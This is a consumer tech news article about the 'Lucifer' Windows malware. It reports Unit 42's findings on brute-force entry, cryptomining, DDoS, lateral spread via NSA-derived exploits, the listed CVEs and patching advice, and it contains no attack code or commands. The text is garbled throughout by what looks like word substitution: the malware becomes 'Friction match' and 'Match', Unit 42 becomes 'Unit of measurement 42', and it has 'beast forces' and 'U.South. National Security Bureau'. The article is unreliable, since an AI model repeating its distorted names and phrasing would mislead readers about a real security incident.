'Lucifer' malware targets Windows machines using NSA exploits: Protect yourself now

(Image credit: Wachiwit / Shutterstock.com)

Security researchers accept constitute a new malware strain that hijacks vulnerable Windows devices to mine cryptocurrency and phase devastating DDoS attacks, leading the researchers to prompt PC users and server administrators to ensure that they are being protected past the all-time antivirus software.

The malware, chosen "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, "beast forces" its way into Windows machines by trying out common usernames and passwords on widely used system ports.

Best antivirus: protect yourself from attacks with online security
VPN: add a layer of actress protection thanks to a virtual private network
Just In: Chrome on Android is getting more secure

The malware primarily targets enterprise servers, especially since those servers can provide entry into corporate networks, but can as well infect personal computers.

Unit of measurement 42 came across the malware afterward investigating the CVE-2019-9081 exploit, a vulnerability in the open-source spider web-application-development Laravel Framework that enables perpetrators to conduct remote-code-execution attacks.

"A closer look revealed the malware, which nosotros've dubbed "Lucifer", is capable of conducting DDoS attacks and [is] well-equipped with all kinds of exploits confronting vulnerable Windows hosts," wrote the Unit 42 researchers in a web log post.

(Lucifer's own creators call the malware "Satan DDoS," but Unit of measurement 42 thought that might cause confusion as there's already "Satan" ransomware.)

"The starting time wave of the campaign stopped on June 10, 2020. The aggressor then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc."

Powerful malware threat

The researchers described Friction match as "quite powerful in its capabilities." One time it has infected a system, it lets the perpetrators mine the Monero cryptocurrency and to spread to other machines on the local network using the EternalBlue, EternalRomance and and DoublePulsar exploits that were stolen from the U.South. National Security Bureau some years ago.

According to the researchers, hackers are "weaponising" a range of security vulnerabilities using the Match malware.

Identified by Mutual Vulnerabilities and Exposures (CVE) ID numbers, these include CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

"These vulnerabilities have either high or critical ratings due to their trivial-to-exploit nature and their tremendous impact inflicted on the victim," explained the researchers.

"Once exploited, the attacker tin execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the aggressor is leveraging certutil utility in the payload for malware propagation."

Certutil.exe is a Microsoft utility that manages the digital certificates necessary to conduct secure internet communications and transactions.

The best Windows 10 VPN is your first line of defence

How to avoid the Lucifer malware

Although these vulnerabilities are certainly worrying, the researchers noted how patches are "readily available" and urged organisations to keep their systems updated to mitigate attacks.

The researchers added: "While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once once again deliver a message to all organizations, reminding them why information technology's utterly of import to proceed systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for balls."

To make sure your Windows arrangement, whether it's a laptop or a web server, isn't hitting by the Match malware, brand sure it'southward fully patched with the latest Windows security updates, and that the arrangement-ambassador username and password are potent and unique.

Of course, information technology helps to be running some of the all-time antivirus software, nearly of which will recognize and block Lucifer and its various components right abroad.

Read more: Bank check out our Antivirus Software Ownership Guide

Nicholas Fearn is a freelance technology journalist and copywriter from the Welsh valleys. His work has appeared in publications such as the FT, the Independent, the Daily Telegraph, The Next Spider web, T3, Android Central, Computer Weekly, and many others. He besides happens to be a diehard Mariah Carey fan!